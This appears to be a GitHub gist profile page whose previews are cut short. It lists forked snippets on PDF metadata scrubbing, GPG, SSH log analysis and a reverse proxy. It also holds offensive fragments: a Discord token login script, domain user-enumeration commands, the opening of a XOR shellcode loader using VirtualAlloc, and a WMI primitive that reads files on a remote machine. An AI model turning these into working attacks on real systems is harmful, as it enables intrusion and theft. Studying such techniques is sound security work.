Skip to content

Instantly share code, notes, and snippets.

View JRandomSage's full-sized avatar

Joshua Harp JRandomSage

9 followers · 99 following
View GitHub Profile
@JRandomSage
JRandomSage / pdf_metadata.md
Created September 21, 2022 11:06 — forked from Te-k/pdf_metadata.md
How to remove metadata from PDFs

Many tools do not fully remove metadata, but just remove the link with in the metadata table. The data are thus still available in the PDF file itself.

While a lot of people rely on Exiftool to remove metadata, it actually does the same in PDFs. If you remove metadata with exiftool -all= some.pdf, you can always restore the data with exiftool -pdf-update:all= some.pdf.

There are several options to remove PDF metadata safely:

Option 1 : Exiftool with qpdf

  • Remove metadata with exiftool : exiftool -all= some.pdf
  • Then remove ununsed objects with qpdf : qpdf --linearize some.pdf - > some.cleaned.pdf
@JRandomSage
JRandomSage / harmony.py
Created September 21, 2022 09:35 — forked from readmeexe/harmony.py
import requests
import time
import random
import string
def auth_headers(token):
return {"Accept-Encoding": "gzip, deflate","Content-Type": "application/json","Authorization": token }
def get_auth_token(email, password):
url = 'https://discordapp.com/api/v6/auth/login'
@JRandomSage
JRandomSage / Domain Enumeration Commands
Created September 21, 2022 09:13 — forked from its-a-feature/Domain Enumeration Commands
Common Domain Enumeration commands in Windows, Mac, and LDAP
Domain: TEST.local
User Enumeration:
Windows:
net user
net user /domain
net user [username]
net user [username] /domain
wmic useraccount
Mac:
dscl . ls /Users
@JRandomSage
JRandomSage / XorRunner.cs
Created September 21, 2022 07:33 — forked from un4ckn0wl3z/XorRunner.cs
using System;
using System.Text;
using System.Runtime.InteropServices;
public class Program
{
//https://docs.microsoft.com/en-us/windows/desktop/api/memoryapi/nf-memoryapi-virtualalloc
[DllImport("kernel32")]
@JRandomSage
JRandomSage / xor.cs
Created September 21, 2022 07:33 — forked from un4ckn0wl3z/xor.cs
using System;
using System.IO;
using System.Text;
public class Program
{
private static byte[] xor(byte[] cipher, byte[] key)
{
@JRandomSage
JRandomSage / analyseBreakinAttempts.sh
Created September 20, 2022 10:32 — forked from pklaus/analyseBreakinAttempts.sh
A script that analyses the log files /var/log/auth.log* for illegal break-in attempts and writes all output to $logdir – Check http://blog.philippklaus.de/2010/02/analyse-illegal-ssh-login-attempts/
#!/bin/bash
# This script analyses the log files /var/log/auth.log* for
# illegal break-in attempts and writes all output to $logdir.
# <http://blog.philippklaus.de/2010/02/analyse-illegal-ssh-login-attempts/#comment-12211>
# inspired by <http://goo.gl/QMOhiU>
# and <http://filipivianna.blogspot.com/2009/10/checking-authlog-for-ssh-brute-force.html>
logbasedir=~/logs
@JRandomSage
JRandomSage / node-reverse-proxy.js
Created September 20, 2022 10:31 — forked from simonw/node-reverse-proxy.js
A reverse proxy in Node - GET only at the moment
// node-reverse-proxy
var sys = require('sys'),
http = require('http');
function proxy(backend, request, response) {
var bits = backend.split(':');
var host = bits[0];
if (bits.length == 2) {
var port = parseInt(bits[1], 10);
@JRandomSage
JRandomSage / GNUPG Cheatsheet.md
Created September 20, 2022 10:15 — forked from turingbirds/GNUPG Cheatsheet.md
GPG (GNUPG) Cheatsheet

GNUPG CHEATSHEET

Setting up: key generation

This generates a public/private keypair.

$ gpg --gen-key

$ gpg --list-secret-keys

@JRandomSage
JRandomSage / FileReadPrimitive.ps1
Created September 20, 2022 10:15 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@JRandomSage
JRandomSage / checksvc.py
Created September 20, 2022 10:03 — forked from wdormann/checksvc.py
Check for insecure services on Windows
import os
import subprocess
import ctypes
# See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/
svcinfo = {}
nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG']
FNULL = open(os.devnull, 'w')